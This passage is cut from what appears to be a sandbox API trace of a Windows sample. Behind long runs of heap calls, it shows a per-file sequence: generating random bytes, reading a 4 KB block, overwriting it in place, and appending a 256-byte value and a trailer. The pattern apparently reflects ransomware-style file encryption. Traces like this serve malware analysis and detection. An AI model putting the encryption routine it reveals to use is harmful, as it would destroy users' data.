hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.199] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.199] GetProcessHeap () returned 0x4f10000 [0079.200] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.200] GetProcessHeap () returned 0x4f10000 [0079.200] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.201] GetProcessHeap () returned 0x4f10000 [0079.201] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.201] GetProcessHeap () returned 0x4f10000 [0079.201] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.201] GetProcessHeap () returned 0x4f10000 [0079.201] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.201] GetProcessHeap () returned 0x4f10000 [0079.201] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.201] GetProcessHeap () returned 0x4f10000 [0079.201] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.201] GetProcessHeap () returned 0x4f10000 [0079.201] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.201] GetProcessHeap () returned 0x4f10000 [0079.201] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.201] GetProcessHeap () returned 0x4f10000 [0079.201] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.201] GetProcessHeap () returned 0x4f10000 [0079.201] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.201] GetProcessHeap () returned 0x4f10000 [0079.201] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.201] GetProcessHeap () returned 0x4f10000 [0079.201] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.201] GetProcessHeap () returned 0x4f10000 [0079.201] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.201] GetProcessHeap () returned 0x4f10000 [0079.201] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.201] GetProcessHeap () returned 0x4f10000 [0079.201] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.202] GetProcessHeap () returned 0x4f10000 [0079.202] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.202] GetProcessHeap () returned 0x4f10000 [0079.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.202] GetProcessHeap () returned 0x4f10000 [0079.202] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.202] GetProcessHeap () returned 0x4f10000 [0079.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.202] GetProcessHeap () returned 0x4f10000 [0079.202] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.202] GetProcessHeap () returned 0x4f10000 [0079.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0079.202] GetProcessHeap () returned 0x4f10000 [0079.202] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.202] GetProcessHeap () returned 0x4f10000 [0079.202] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0079.202] GetProcessHeap () returned 0x4f10000 [0079.202] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0079.202] GetProcessHeap () returned 0x4f10000 [0079.202] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0079.202] GetProcessHeap () returned 0x4f10000 [0079.202] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0079.202] SetFilePointerEx (in: hFile=0x820, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.202] WriteFile (in: hFile=0x820, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.203] WriteFile (in: hFile=0x820, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.203] GetProcessHeap () returned 0x4f10000 [0079.203] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0079.203] GetProcessHeap () returned 0x4f10000 [0079.203] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0079.203] GetProcessHeap () returned 0x4f10000 [0079.203] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0079.203] CloseHandle (hObject=0x820) returned 1 [0079.204] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 41 [0079.204] SetFilePointerEx (in: hFile=0x824, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.204] ReadFile (in: hFile=0x824, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.204] SetFilePointerEx (in: hFile=0x824, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.204] GetProcessHeap () returned 0x4f10000 [0079.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0079.204] GetProcessHeap () returned 0x4f10000 [0079.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0079.204] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0079.204] GetProcessHeap () returned 0x4f10000 [0079.204] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0079.204] ReadFile (in: hFile=0x824, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.254] SetFilePointerEx (in: hFile=0x824, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.254] WriteFile (in: hFile=0x824, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.254] GetProcessHeap () returned 0x4f10000 [0079.254] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0079.254] GetProcessHeap () returned 0x4f10000 [0079.254] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.254] GetProcessHeap () returned 0x4f10000 [0079.254] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0079.254] GetProcessHeap () returned 0x4f10000 [0079.254] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.254] GetProcessHeap () returned 0x4f10000 [0079.254] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0079.254] GetProcessHeap () returned 0x4f10000 [0079.254] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.255] GetProcessHeap () returned 0x4f10000 [0079.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0079.256] GetProcessHeap () returned 0x4f10000 [0079.256] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.257] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.257] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.257] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.257] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.257] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.257] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.257] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.257] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.257] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.257] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.257] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.257] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.257] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.257] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.257] GetProcessHeap () returned 0x4f10000 [0079.258] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.258] GetProcessHeap () returned 0x4f10000 [0079.258] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.258] GetProcessHeap () returned 0x4f10000 [0079.258] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.258] GetProcessHeap () returned 0x4f10000 [0079.258] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.258] GetProcessHeap () returned 0x4f10000 [0079.258] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.258] GetProcessHeap () returned 0x4f10000 [0079.258] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.258] GetProcessHeap () returned 0x4f10000 [0079.258] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.258] GetProcessHeap () returned 0x4f10000 [0079.258] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.258] GetProcessHeap () returned 0x4f10000 [0079.258] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.258] GetProcessHeap () returned 0x4f10000 [0079.258] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.258] GetProcessHeap () returned 0x4f10000 [0079.258] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.258] GetProcessHeap () returned 0x4f10000 [0079.258] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.258] GetProcessHeap () returned 0x4f10000 [0079.258] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.258] GetProcessHeap () returned 0x4f10000 [0079.258] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.258] GetProcessHeap () returned 0x4f10000 [0079.258] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0079.259] GetProcessHeap () returned 0x4f10000 [0079.259] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.259] GetProcessHeap () returned 0x4f10000 [0079.259] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0079.259] GetProcessHeap () returned 0x4f10000 [0079.259] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0079.259] GetProcessHeap () returned 0x4f10000 [0079.259] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0079.259] GetProcessHeap () returned 0x4f10000 [0079.259] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0079.259] SetFilePointerEx (in: hFile=0x824, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.259] WriteFile (in: hFile=0x824, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.259] WriteFile (in: hFile=0x824, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: 